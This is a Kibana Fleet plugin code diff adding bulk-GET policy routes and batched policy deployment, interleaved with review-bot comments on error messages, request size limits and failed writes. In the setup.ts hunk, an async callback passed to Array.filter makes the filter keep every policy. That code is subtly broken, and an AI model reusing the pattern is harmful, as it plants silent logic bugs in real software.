agentPolicyService.list(soClient, { + kuery: `${AGENT_POLICY_SAVED_OBJECT_TYPE}.schema_version:${FLEET_AGENT_POLICIES_SCHEMA_VERSION}`, + }); + // all 3 should be up-to-date 
after upgrade + expect(policies.total).toBe(3); + + esRes = await esClient.search({ + index: AGENT_POLICY_INDEX, + body: { query: { match: { revision_idx: 2 } } }, + }); + // since only 2 were updated, only 2 should be written + expect((esRes.hits.total as SearchTotalHits).value).toBe(2); + }); + }); +}); diff --git a/x-pack/plugins/fleet/server/integration_tests/validate_bundled_packages.test.ts b/x-pack/plugins/fleet/server/integration_tests/validate_bundled_packages.test.ts index 6b5f3efeae538..79388d7d5b914 100644 --- a/x-pack/plugins/fleet/server/integration_tests/validate_bundled_packages.test.ts +++ b/x-pack/plugins/fleet/server/integration_tests/validate_bundled_packages.test.ts 
@@ -37,23 +37,32 @@ describe('validate bundled packages', () => { } async function setupPackageObjects() { + // APM is a special case package in that it's "bundled release" is not available + // on the v2 registry image, because v2 currently only contains production packages. + // We bundle APM from snapshot, but that bundled version isn't available in the docker + // image that's running EPR during FTR runs, so to avoid nasty test failures we don't + // verify APM here. + const EXCLUDED_PACKAGES = ['apm']; + const bundledPackages = await getBundledPackageEntries(); const packageObjects = await Promise.all( - bundledPackages.map(async (bundledPackage) => { - const registryPackage = await Registry.getRegistryPackage( - bundledPackage.name, - bundledPackage.version - ); - - const packageArchive = await Registry.fetchArchiveBuffer({ - pkgName: bundledPackage.name, - pkgVersion: bundledPackage.version, - shouldVerify: false, - }); - - return { registryPackage, packageArchive }; - }) + bundledPackages + .filter((pkg) => !EXCLUDED_PACKAGES.includes(pkg.name)) + .map(async (bundledPackage) => { + const registryPackage = await Registry.getRegistryPackage( + bundledPackage.name, + bundledPackage.version + ); + + const packageArchive = await Registry.fetchArchiveBuffer({ + pkgName: bundledPackage.name, + pkgVersion: bundledPackage.version, + shouldVerify: false, + }); + + return { registryPackage, packageArchive }; + }) ); return packageObjects; diff --git a/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.test.ts b/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.test.ts new file mode 100644 index 0000000000000..5eafcf1a94104 --- /dev/null +++ b/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.test.ts 
@@ -0,0 +1,26 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { checkKibanaVersion } from './upgrade_handler'; + +describe('upgrade handler', () => { + describe('checkKibanaVersion', () => { + it('should not throw if upgrade version is equal to kibana version', () => { + expect(() => checkKibanaVersion('8.4.0', '8.4.0')).not.toThrowError(); + }); + + it('should throw if upgrade version is higher than kibana version', () => { + expect(() => checkKibanaVersion('8.5.0', '8.4.0')).toThrowError( + 'cannot upgrade agent to 8.5.0 because it is higher than the installed kibana version 8.4.0' + ); + }); + + it('should not throw if upgrade version is equal to kibana version with snapshot', () => { + expect(() => checkKibanaVersion('8.4.0', '8.4.0-SNAPSHOT')).not.toThrowError(); + }); + }); +}); diff --git a/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.ts b/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.ts index 024158b5b8785..d75e3ad07d9b8 100644 --- a/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.ts +++ b/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.ts @@ -160,7 +160,7 @@ export const checkKibanaVersion = (version: string, kibanaVersion: string) => { if (!versionToUpgradeNumber) throw new Error(`version to upgrade ${versionToUpgradeNumber} is not valid`); - if (semverGt(version, kibanaVersion)) + if (semverGt(versionToUpgradeNumber, kibanaVersionNumber)) throw new Error( `cannot upgrade agent to ${versionToUpgradeNumber} because it is higher than the installed kibana version ${kibanaVersionNumber}` ); diff --git a/x-pack/plugins/fleet/server/routes/agent_policy/handlers.ts b/x-pack/plugins/fleet/server/routes/agent_policy/handlers.ts index 0f632dfbb9cff..8235c3c3348b2 100644 
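Review bot: The guard on the line just above the changed comparison interpolates the value it has just found falsy, so the thrown message reads "version to upgrade undefined is not valid"; it should report the raw input instead: `throw new Error(\`version to upgrade ${version} is not valid\`);`. The new `semverGt(versionToUpgradeNumber, kibanaVersionNumber)` is the right fix for the `-SNAPSHOT` case the new test file covers, but no equivalent guard for `kibanaVersionNumber` is visible in the hunk; if it can be undefined, `semverGt` would presumably fail with a TypeError rather than a readable error, so that derivation is worth confirming. `checkKibanaVersion` starts outside the hunk.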
--- a/x-pack/plugins/fleet/server/routes/agent_policy/handlers.ts +++ b/x-pack/plugins/fleet/server/routes/agent_policy/handlers.ts @@ -6,7 +6,7 @@ */ import type { TypeOf } from '@kbn/config-schema'; -import type { RequestHandler, ResponseHeaders } from '@kbn/core/server'; +import type { RequestHandler, ResponseHeaders, ElasticsearchClient } from '@kbn/core/server'; import pMap from 'p-map'; import { safeDump } from 'js-yaml'; @@ -24,6 +24,8 @@ import type { GetFullAgentPolicyRequestSchema, GetK8sManifestRequestSchema, FleetRequestHandler, + BulkGetAgentPoliciesRequestSchema, + AgentPolicy, } from '../../types'; import type { @@ -37,10 +39,28 @@ import type { GetFullAgentPolicyResponse, GetFullAgentConfigMapResponse, GetFullAgentManifestResponse, + BulkGetAgentPoliciesResponse, } from '../../../common/types'; -import { defaultIngestErrorHandler } from '../../errors'; +import { defaultIngestErrorHandler, AgentPolicyNotFoundError } from '../../errors'; import { createAgentPolicyWithPackages } from '../../services/agent_policy_create'; +async function populateAssignedAgentsCount( + esClient: ElasticsearchClient, + agentPolicies: AgentPolicy[] +) { + await pMap( + agentPolicies, + (agentPolicy: GetAgentPoliciesResponseItem) => + getAgentsByKuery(esClient, { + showInactive: false, + perPage: 0, + page: 1, + kuery: `${AGENTS_PREFIX}.policy_id:${agentPolicy.id}`, + }).then(({ total: agentTotal }) => (agentPolicy.agents = agentTotal)), + { concurrency: 10 } + ); +} + export const getAgentPoliciesHandler: FleetRequestHandler< undefined, TypeOf 
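Review bot: `populateAssignedAgentsCount` is undocumented and its only effect is a mutation of the caller's array — each element gets an `agents` property assigned inside the `.then` — which is easy to miss because the function returns nothing. Add a TSDoc comment above it, e.g. `/** Sets agents on every policy in place to the number of active agents enrolled in it, issuing one agents query per policy with at most 10 in flight. Mutates the passed array and returns nothing. */`, and make the return type explicit with `): Promise<void> {`. The callback annotates its element as `GetAgentPoliciesResponseItem` while the parameter is typed `AgentPolicy[]`, which presumably relies on the two types being compatible; a one-line comment saying so would help, since the `agents` field is what the assignment depends on.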
@@ -62,20 +82,45 @@ export const getAgentPoliciesHandler: FleetRequestHandler< perPage, }; - await pMap( + await populateAssignedAgentsCount(esClient, items); + + return response.ok({ body }); + } catch (error) { + return defaultIngestErrorHandler({ error, response }); + } +}; + +export const bulkGetAgentPoliciesHandler: FleetRequestHandler< + undefined, + undefined, + TypeOf +> = async (context, request, response) => { + const coreContext = await context.core; + const fleetContext = await context.fleet; + const soClient = fleetContext.epm.internalSoClient; + const esClient = coreContext.elasticsearch.client.asInternalUser; + const { full: withPackagePolicies = false, ignoreMissing = false, ids } = request.body; + try { + const items = await agentPolicyService.getByIDs(soClient, ids, { + withPackagePolicies, + ignoreMissing, + }); + const body: BulkGetAgentPoliciesResponse = { items, - (agentPolicy: GetAgentPoliciesResponseItem) => - getAgentsByKuery(esClient, { - showInactive: false, - perPage: 0, - page: 1, - kuery: `${AGENTS_PREFIX}.policy_id:${agentPolicy.id}`, - }).then(({ total: agentTotal }) => (agentPolicy.agents = agentTotal)), - { concurrency: 10 } - ); + }; + + await populateAssignedAgentsCount(esClient, items); return response.ok({ body }); } catch (error) { + if (error instanceof AgentPolicyNotFoundError) { + return response.notFound({ + body: { + message: error.message, + }, + }); + } + return defaultIngestErrorHandler({ error, response }); } }; diff --git a/x-pack/plugins/fleet/server/routes/agent_policy/index.ts b/x-pack/plugins/fleet/server/routes/agent_policy/index.ts index b42799d738d4c..938d8b3332b71 100644 --- a/x-pack/plugins/fleet/server/routes/agent_policy/index.ts +++ b/x-pack/plugins/fleet/server/routes/agent_policy/index.ts 
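Review bot: `bulkGetAgentPoliciesHandler` accepts any number of `ids` and then fans out one agents query per policy through `populateAssignedAgentsCount`, with `full` adding a further saved-object fetch per policy inside `getByIDs`; `BulkRequestBodySchema` in the common.ts hunk validates only `minSize: 1`, so a single authenticated request can drive thousands of Elasticsearch queries. Cap the array in the schema, e.g. `ids: schema.arrayOf(schema.string(), { minSize: 1, maxSize: BULK_GET_MAX_IDS /* constructed placeholder: choose the limit one request should serve */ })`, which also covers `bulkGetPackagePoliciesHandler` in the package_policy handlers.ts hunk. The 404 branch is fine as written since the message only echoes an id the caller supplied.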
@@ -15,6 +15,7 @@ import { DeleteAgentPolicyRequestSchema, GetFullAgentPolicyRequestSchema, GetK8sManifestRequestSchema, + BulkGetAgentPoliciesRequestSchema, } from '../../types'; import type { FleetAuthzRouter } from '../security'; @@ -31,6 +32,7 @@ import { downloadFullAgentPolicy, downloadK8sManifest, getK8sManifest, + bulkGetAgentPoliciesHandler, } from './handlers'; export const registerRoutes = (router: FleetAuthzRouter) => { @@ -46,6 +48,18 @@ export const registerRoutes = (router: FleetAuthzRouter) => { getAgentPoliciesHandler ); + // Bulk GET + router.post( + { + path: AGENT_POLICY_API_ROUTES.BULK_GET_PATTERN, + validate: BulkGetAgentPoliciesRequestSchema, + fleetAuthz: { + fleet: { readAgentPolicies: true }, + }, + }, + bulkGetAgentPoliciesHandler + ); + // Get one router.get( { diff --git a/x-pack/plugins/fleet/server/routes/package_policy/handlers.test.ts b/x-pack/plugins/fleet/server/routes/package_policy/handlers.test.ts index 222408c6e0524..5e67857540143 100644 --- a/x-pack/plugins/fleet/server/routes/package_policy/handlers.test.ts +++ b/x-pack/plugins/fleet/server/routes/package_policy/handlers.test.ts @@ -138,8 +138,8 @@ describe('When calling package policy', () => { // Set the routeConfig and routeHandler to the Create API beforeEach(() => { - [routeConfig, routeHandler] = routerMock.post.mock.calls.find(([{ path }]) => - path.startsWith(PACKAGE_POLICY_API_ROUTES.CREATE_PATTERN) + [routeConfig, routeHandler] = routerMock.post.mock.calls.find( + ([{ path }]) => path === PACKAGE_POLICY_API_ROUTES.CREATE_PATTERN )!; }); diff --git a/x-pack/plugins/fleet/server/routes/package_policy/handlers.ts b/x-pack/plugins/fleet/server/routes/package_policy/handlers.ts index 8ecbd11ec5986..0b5f71910cfa9 100644 --- a/x-pack/plugins/fleet/server/routes/package_policy/handlers.ts +++ b/x-pack/plugins/fleet/server/routes/package_policy/handlers.ts 
@@ -25,8 +25,10 @@ import type { FleetRequestHandler, PackagePolicy, DeleteOnePackagePolicyRequestSchema, + BulkGetPackagePoliciesRequestSchema, } from '../../types'; import type { + BulkGetPackagePoliciesResponse, CreatePackagePolicyResponse, DeletePackagePoliciesResponse, NewPackagePolicy, @@ -34,7 +36,7 @@ import type { UpgradePackagePolicyResponse, } from '../../../common/types'; import { installationStatuses } from '../../../common/constants'; -import { defaultIngestErrorHandler } from '../../errors'; +import { defaultIngestErrorHandler, PackagePolicyNotFoundError } from '../../errors'; import { getInstallations } from '../../services/epm/packages'; import { PACKAGES_SAVED_OBJECT_TYPE, SO_SEARCH_LIMIT } from '../../constants'; @@ -61,6 +63,34 @@ export const getPackagePoliciesHandler: RequestHandler< } }; +export const bulkGetPackagePoliciesHandler: RequestHandler< + undefined, + undefined, + TypeOf +> = async (context, request, response) => { + const soClient = (await context.core).savedObjects.client; + const { ids, ignoreMissing } = request.body; + try { + const items = await packagePolicyService.getByIDs(soClient, ids, { + ignoreMissing, + }); + + const body: BulkGetPackagePoliciesResponse = { items: items ?? [] }; + + return response.ok({ + body, + }); + } catch (error) { + if (error instanceof PackagePolicyNotFoundError) { + return response.notFound({ + body: { message: error.message }, + }); + } + + return defaultIngestErrorHandler({ error, response }); + } +}; + export const getOnePackagePolicyHandler: RequestHandler< TypeOf > = async (context, request, response) => { diff --git a/x-pack/plugins/fleet/server/routes/package_policy/index.ts b/x-pack/plugins/fleet/server/routes/package_policy/index.ts index cf52b740245f8..004037623bb0d 100644 --- a/x-pack/plugins/fleet/server/routes/package_policy/index.ts +++ b/x-pack/plugins/fleet/server/routes/package_policy/index.ts 
@@ -15,6 +15,7 @@ import { UpgradePackagePoliciesRequestSchema, DryRunPackagePoliciesRequestSchema, DeleteOnePackagePolicyRequestSchema, + BulkGetPackagePoliciesRequestSchema, } from '../../types'; import type { FleetAuthzRouter } from '../security'; @@ -28,6 +29,7 @@ import { dryRunUpgradePackagePolicyHandler, getOrphanedPackagePolicies, deleteOnePackagePolicyHandler, + bulkGetPackagePoliciesHandler, } from './handlers'; export const registerRoutes = (router: FleetAuthzRouter) => { @@ -43,6 +45,17 @@ export const registerRoutes = (router: FleetAuthzRouter) => { getPackagePoliciesHandler ); + router.post( + { + path: PACKAGE_POLICY_API_ROUTES.BULK_GET_PATTERN, + validate: BulkGetPackagePoliciesRequestSchema, + fleetAuthz: { + integrations: { readIntegrationPolicies: true }, + }, + }, + bulkGetPackagePoliciesHandler + ); + // Get one router.get( { diff --git a/x-pack/plugins/fleet/server/saved_objects/index.ts b/x-pack/plugins/fleet/server/saved_objects/index.ts index 0ccac385155b5..652a30d174190 100644 --- a/x-pack/plugins/fleet/server/saved_objects/index.ts +++ b/x-pack/plugins/fleet/server/saved_objects/index.ts @@ -84,6 +84,7 @@ const getSavedObjectTypes = ( mappings: { properties: { name: { type: 'keyword' }, + schema_version: { type: 'version' }, description: { type: 'text' }, namespace: { type: 'keyword' }, is_managed: { type: 'boolean' }, diff --git a/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.test.ts b/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.test.ts index a3c4f7754f5fa..82a7612cc8195 100644 --- a/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.test.ts +++ b/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.test.ts 
@@ -183,6 +183,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'test-logs-some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-logs', data_stream: { namespace: 'default' }, @@ -235,6 +236,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'test-logs-some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-logs', data_stream: { namespace: 'default' }, @@ -261,6 +263,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'test-metrics-some-template-some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-metrics', data_stream: { namespace: 'default' }, @@ -283,6 +286,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-metrics', data_stream: { namespace: 'default' }, @@ -330,6 +334,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'test-logs-some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-logs', data_stream: { namespace: 'default' }, @@ -362,6 +367,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'test-logs-some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-logs', data_stream: { namespace: 'default' }, @@ -425,6 +431,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { id: 'test-logs-some-uuid', revision: 1, name: 'mock-package-policy', + package_policy_id: 'some-uuid', type: 'test-logs', data_stream: { namespace: 'default' }, use_output: 'default', diff --git a/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.ts b/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.ts index 111c07d78472f..fd8d925b48855 100644 
--- a/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.ts +++ b/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.ts @@ -57,6 +57,7 @@ export const storedPackagePolicyToAgentInputs = ( namespace: packagePolicy.namespace || 'default', }, use_output: outputId, + package_policy_id: packagePolicy.id, ...(input.compiled_input || {}), ...(input.streams.length ? { diff --git a/x-pack/plugins/fleet/server/services/agent_policy.test.ts b/x-pack/plugins/fleet/server/services/agent_policy.test.ts index 2d5bc0aa4f88a..4d348af471772 100644 --- a/x-pack/plugins/fleet/server/services/agent_policy.test.ts +++ b/x-pack/plugins/fleet/server/services/agent_policy.test.ts @@ -18,6 +18,8 @@ import type { import { AGENT_POLICY_SAVED_OBJECT_TYPE } from '../constants'; +import { AGENT_POLICY_INDEX } from '../../common'; + import { agentPolicyService } from './agent_policy'; import { agentPolicyUpdateEventHandler } from './agent_policy_update'; @@ -67,7 +69,6 @@ jest.mock('./agents'); jest.mock('./package_policy'); jest.mock('./app_context'); jest.mock('./agent_policies/full_agent_policy'); -jest.mock('uuid/v5'); const mockedAppContextService = appContextService as jest.Mocked; const mockedOutputService = outputService as jest.Mocked; @@ -383,11 +384,15 @@ describe('agent policy', () => { mockedOutputService.getDefaultDataOutputId.mockResolvedValue('default-output'); mockedGetFullAgentPolicy.mockResolvedValue(null); - soClient.get.mockResolvedValue({ + const mockSo = { attributes: {}, id: 'policy123', type: 'mocked', references: [], + }; + soClient.get.mockResolvedValue(mockSo); + soClient.bulkGet.mockResolvedValue({ + saved_objects: [mockSo], }); await agentPolicyService.deployPolicy(soClient, 'policy123'); 
@@ -409,24 +414,36 @@ describe('agent policy', () => { ], } as FullAgentPolicy); - soClient.get.mockResolvedValue({ + const mockSo = { attributes: {}, id: 'policy123', type: 'mocked', references: [], + }; + soClient.get.mockResolvedValue(mockSo); + soClient.bulkGet.mockResolvedValue({ + saved_objects: [mockSo], }); await agentPolicyService.deployPolicy(soClient, 'policy123'); - expect(esClient.create).toBeCalledWith( + expect(esClient.bulk).toBeCalledWith( expect.objectContaining({ - index: '.fleet-policies', - body: expect.objectContaining({ - '@timestamp': expect.anything(), - data: { id: 'policy123', inputs: [{ id: 'input-123' }], revision: 1 }, - default_fleet_server: false, - policy_id: 'policy123', - revision_idx: 1, - }), + index: AGENT_POLICY_INDEX, + body: [ + expect.objectContaining({ + index: { + _id: expect.anything(), + }, + }), + expect.objectContaining({ + '@timestamp': expect.anything(), + data: { id: 'policy123', inputs: [{ id: 'input-123' }], revision: 1 }, + default_fleet_server: false, + policy_id: 'policy123', + revision_idx: 1, + }), + ], + refresh: 'wait_for', }) ); }); diff --git a/x-pack/plugins/fleet/server/services/agent_policy.ts b/x-pack/plugins/fleet/server/services/agent_policy.ts index 79ce7d3a3656b..4008100518984 100644 --- a/x-pack/plugins/fleet/server/services/agent_policy.ts +++ b/x-pack/plugins/fleet/server/services/agent_policy.ts @@ -5,11 +5,11 @@ * 2.0. */ -import { uniq, omit, isEqual } from 'lodash'; -import uuid from 'uuid/v4'; +import { uniq, omit, isEqual, keyBy } from 'lodash'; import uuidv5 from 'uuid/v5'; import { safeDump } from 'js-yaml'; import pMap from 'p-map'; +import { lt } from 'semver'; import type { ElasticsearchClient, SavedObjectsClientContract, 
@@ -17,6 +17,7 @@ import type { } from '@kbn/core/server'; import type { AuthenticatedUser } from '@kbn/security-plugin/server'; +import type { BulkResponseItem } from '@elastic/elasticsearch/lib/api/typesWithBodyKey'; import { DEFAULT_SPACE_ID } from '@kbn/spaces-plugin/common/constants'; @@ -25,6 +26,7 @@ import { AGENTS_PREFIX, PRECONFIGURATION_DELETION_RECORD_SAVED_OBJECT_TYPE, SO_SEARCH_LIMIT, + FLEET_AGENT_POLICIES_SCHEMA_VERSION, } from '../constants'; import type { PackagePolicy, @@ -51,7 +53,11 @@ import type { Output, DeletePackagePoliciesResponse, } from '../../common/types'; -import { AgentPolicyNameExistsError, HostedAgentPolicyRestrictionRelatedError } from '../errors'; +import { + AgentPolicyNameExistsError, + HostedAgentPolicyRestrictionRelatedError, + AgentPolicyNotFoundError, +} from '../errors'; import type { FullAgentConfigMap } from '../../common/types/models/agent_cm'; @@ -204,6 +210,7 @@ class AgentPolicyService { revision: 1, updated_at: new Date().toISOString(), updated_by: options?.user?.username || 'system', + schema_version: FLEET_AGENT_POLICIES_SCHEMA_VERSION, } as AgentPolicy, options ); @@ -256,7 +263,10 @@ class AgentPolicyService { agentPolicy.package_policies = (await packagePolicyService.getByIDs( soClient, - (agentPolicySO.attributes.package_policies as string[]) || [] + (agentPolicySO.attributes.package_policies as string[]) || [], + { + ignoreMissing: true, + } )) || []; } 
@@ -266,16 +276,44 @@ class AgentPolicyService { public async getByIDs( soClient: SavedObjectsClientContract, ids: string[], - options: { fields?: string[] } = {} + options: { fields?: string[]; withPackagePolicies?: boolean; ignoreMissing?: boolean } = {} ): Promise { const objects = ids.map((id) => ({ ...options, id, type: SAVED_OBJECT_TYPE })); - const agentPolicySO = await soClient.bulkGet(objects); + const bulkGetResponse = await soClient.bulkGet(objects); - return agentPolicySO.saved_objects.map((so) => ({ - id: so.id, - version: so.version, - ...so.attributes, - })); + const agentPolicies = await pMap( + bulkGetResponse.saved_objects, + async (agentPolicySO) => { + if (agentPolicySO.error) { + if (options.ignoreMissing && agentPolicySO.error.statusCode === 404) { + return null; + } else if (agentPolicySO.error.statusCode === 404) { + throw new AgentPolicyNotFoundError(`Agent policy ${agentPolicySO.id} not found`); + } else { + throw new Error(agentPolicySO.error.message); + } + } + + const agentPolicy = { + id: agentPolicySO.id, + ...agentPolicySO.attributes, + }; + if (options.withPackagePolicies) { + const agentPolicyWithPackagePolicies = await this.get( + soClient, + agentPolicySO.id, + options.withPackagePolicies + ); + if (agentPolicyWithPackagePolicies) { + agentPolicy.package_policies = agentPolicyWithPackagePolicies.package_policies; + } + } + return agentPolicy; + }, + { concurrency: 50 } + ); + + return agentPolicies.filter((agentPolicy): agentPolicy is AgentPolicy => agentPolicy !== null); } public async list( 
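Review bot: The rewritten `getByIDs` no longer returns `version` — the removed mapping produced `{ id, version, ...attributes }` while the new `agentPolicy` object is `{ id, ...attributes }` — which is an observable change for any caller that uses the saved-object version and is inconsistent with `packagePolicyService.getByIDs` in the package_policy.ts hunk, which keeps it; restore it with `const agentPolicy = { id: agentPolicySO.id, version: agentPolicySO.version, ...agentPolicySO.attributes };`. Separately, `{ ...options, id, type: SAVED_OBJECT_TYPE }` now spreads `withPackagePolicies` and `ignoreMissing` into every `bulkGet` object, where only `fields` is meaningful; pass it explicitly with `const objects = ids.map((id) => ({ fields: options.fields, id, type: SAVED_OBJECT_TYPE }));`. When `withPackagePolicies` is set each policy costs a second `this.get` round trip (bounded by the `pMap` concurrency of 50 but still N+1), which deserves a comment since this path is reachable from the new bulk GET route.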
@@ -707,6 +745,10 @@ class AgentPolicyService { } public async deployPolicy(soClient: SavedObjectsClientContract, agentPolicyId: string) { + await this.deployPolicies(soClient, [agentPolicyId]); + } + + public async deployPolicies(soClient: SavedObjectsClientContract, agentPolicyIds: string[]) { // Use internal ES client so we have permissions to write to .fleet* indices const esClient = appContextService.getInternalUserESClient(); const defaultOutputId = await outputService.getDefaultDataOutputId(soClient); 
@@ -715,31 +757,93 @@ class AgentPolicyService { return; } - const policy = await agentPolicyService.get(soClient, agentPolicyId); - const fullPolicy = await agentPolicyService.getFullAgentPolicy(soClient, agentPolicyId); - if (!policy || !fullPolicy || !fullPolicy.revision) { - return; - } + const policies = await agentPolicyService.getByIDs(soClient, agentPolicyIds); + const policiesMap = keyBy(policies, 'id'); + const fullPolicies = await Promise.all( + agentPolicyIds.map((agentPolicyId) => + // There are some potential performance concerns around using `getFullAgentPolicy` in this context, e.g. + // re-fetching outputs, settings, and upgrade download source URI data for each policy. This could potentially + // be a bottleneck in environments with several thousand agent policies being deployed here. + agentPolicyService.getFullAgentPolicy(soClient, agentPolicyId) + ) + ); - const fleetServerPolicy: FleetServerPolicy = { - '@timestamp': new Date().toISOString(), - revision_idx: fullPolicy.revision, - coordinator_idx: 0, - data: fullPolicy as unknown as FleetServerPolicy['data'], - policy_id: fullPolicy.id, - default_fleet_server: policy.is_default_fleet_server === true, - }; + const fleetServerPolicies = fullPolicies.reduce((acc, fullPolicy) => { + if (!fullPolicy || !fullPolicy.revision) { + return acc; + } - if (policy.unenroll_timeout) { - fleetServerPolicy.unenroll_timeout = policy.unenroll_timeout; - } + const policy = policiesMap[fullPolicy.id]; + if (!policy) { + return acc; + } + + const fleetServerPolicy: FleetServerPolicy = { + '@timestamp': new Date().toISOString(), + revision_idx: fullPolicy.revision, + coordinator_idx: 0, + data: fullPolicy as unknown as FleetServerPolicy['data'], + policy_id: fullPolicy.id, + default_fleet_server: policy.is_default_fleet_server === true, + }; + + if (policy.unenroll_timeout) { + fleetServerPolicy.unenroll_timeout = policy.unenroll_timeout; + } + + return [...acc, fleetServerPolicy]; + }, [] as FleetServerPolicy[]); 
- await esClient.create({ + const fleetServerPoliciesBulkBody = fleetServerPolicies.flatMap((fleetServerPolicy) => [ + { + index: { + _id: uuidv5( + `${fleetServerPolicy.policy_id}:${fleetServerPolicy.revision_idx}`, + uuidv5.DNS + ), + }, + }, + fleetServerPolicy, + ]); + + const bulkResponse = await esClient.bulk({ index: AGENT_POLICY_INDEX, - body: fleetServerPolicy, - id: uuid(), + body: fleetServerPoliciesBulkBody, refresh: 'wait_for', }); + + if (bulkResponse.errors) { + const logger = appContextService.getLogger(); + const erroredDocuments = bulkResponse.items.reduce((acc, item) => { + const value: BulkResponseItem | undefined = item.index; + if (!value || !value.error) { + return acc; + } + + return [...acc, value]; + }, [] as BulkResponseItem[]); + + logger.debug( + `Failed to index documents during policy deployment: ${JSON.stringify(erroredDocuments)}` + ); + } + + await Promise.all( + fleetServerPolicies + .filter((fleetServerPolicy) => { + const policy = policiesMap[fleetServerPolicy.policy_id]; + return ( + !policy.schema_version || lt(policy.schema_version, FLEET_AGENT_POLICIES_SCHEMA_VERSION) + ); + }) + .map((fleetServerPolicy) => + // There are some potential performance concerns around using `agentPolicyService.update` in this context. + // This could potentially be a bottleneck in environments with several thousand agent policies being deployed here. + agentPolicyService.update(soClient, esClient, fleetServerPolicy.policy_id, { + schema_version: FLEET_AGENT_POLICIES_SCHEMA_VERSION, + }) + ) + ); } public async deleteFleetServerPoliciesForPolicyId( diff --git a/x-pack/plugins/fleet/server/services/agents/hosted_agent.ts b/x-pack/plugins/fleet/server/services/agents/hosted_agent.ts index 0c26e09575ac3..4acba8551e86d 100644 --- a/x-pack/plugins/fleet/server/services/agents/hosted_agent.ts +++ b/x-pack/plugins/fleet/server/services/agents/hosted_agent.ts 
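Review bot: A failed bulk index item is only logged at `debug` and then ignored, so the `schema_version` bump that follows still runs for a policy whose `.fleet-policies` document was not written; because `upgradeAgentPolicySchemaVersion` selects its work by `schema_version`, that policy is then treated as migrated and never retried, and Fleet Server presumably never receives that revision. Bulk response items come back in request order, so each errored item maps to `fleetServerPolicies[i]`; exclude those policy ids from the update and log the failure at `error` level rather than `debug`. `deployPolicies` starts in the previous hunk and ends inside this one.
```typescript
    const bulkResponse = await esClient.bulk({
      // … unchanged: index, body, refresh …
    });

    // Bulk items are returned in request order, so item i belongs to fleetServerPolicies[i].
    const failedPolicyIds = new Set<string>();
    bulkResponse.items.forEach((item, i) => {
      const value: BulkResponseItem | undefined = item.index;
      const fleetServerPolicy = fleetServerPolicies[i];
      if (value?.error && fleetServerPolicy) {
        failedPolicyIds.add(fleetServerPolicy.policy_id);
      }
    });
    if (failedPolicyIds.size > 0) {
      appContextService
        .getLogger()
        .error(
          `Failed to index .fleet-policies documents for policies: ${[...failedPolicyIds].join(', ')}`
        );
    }

    await Promise.all(
      fleetServerPolicies
        .filter((fleetServerPolicy) => {
          if (failedPolicyIds.has(fleetServerPolicy.policy_id)) {
            return false; // leave schema_version outdated so the next setup retries this policy
          }
          const policy = policiesMap[fleetServerPolicy.policy_id];
          return (
            !policy.schema_version || lt(policy.schema_version, FLEET_AGENT_POLICIES_SCHEMA_VERSION)
          );
        })
        // … unchanged: .map(...) calling agentPolicyService.update …
    );
```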
@@ -22,6 +22,7 @@ export async function getHostedPolicies( // get the agent policies for those ids const agentPolicies = await agentPolicyService.getByIDs(soClient, Array.from(policyIdsToGet), { fields: ['is_managed'], + ignoreMissing: true, }); const hostedPolicies = agentPolicies.reduce>((acc, policy) => { acc[policy.id] = policy.is_managed; diff --git a/x-pack/plugins/fleet/server/services/agents/setup.ts b/x-pack/plugins/fleet/server/services/agents/setup.ts index 75ab47ae90375..a6536812a5e58 100644 --- a/x-pack/plugins/fleet/server/services/agents/setup.ts +++ b/x-pack/plugins/fleet/server/services/agents/setup.ts @@ -21,16 +21,12 @@ export async function ensureFleetServerAgentPoliciesExists( perPage: SO_SEARCH_LIMIT, }); - await Promise.all( - agentPolicies.map(async (agentPolicy) => { - const policyChangeActionExist = !!(await agentPolicyService.getLatestFleetPolicy( - esClient, - agentPolicy.id - )); + const outdatedAgentPolicyIds = agentPolicies + .filter( + async (agentPolicy) => + !!(await agentPolicyService.getLatestFleetPolicy(esClient, agentPolicy.id)) + ) + .map((agentPolicy) => agentPolicy.id); - if (!policyChangeActionExist) { - return agentPolicyService.deployPolicy(soClient, agentPolicy.id); - } - }) - ); + await agentPolicyService.deployPolicies(soClient, outdatedAgentPolicyIds); } diff --git a/x-pack/plugins/fleet/server/services/agents/status.test.ts b/x-pack/plugins/fleet/server/services/agents/status.test.ts index 8b30edeb5b5f8..7c598bf783c14 100644 --- a/x-pack/plugins/fleet/server/services/agents/status.test.ts +++ b/x-pack/plugins/fleet/server/services/agents/status.test.ts @@ -37,6 +37,7 @@ describe('Agent status service', () => { _id: 'id', _source: { active: true, + 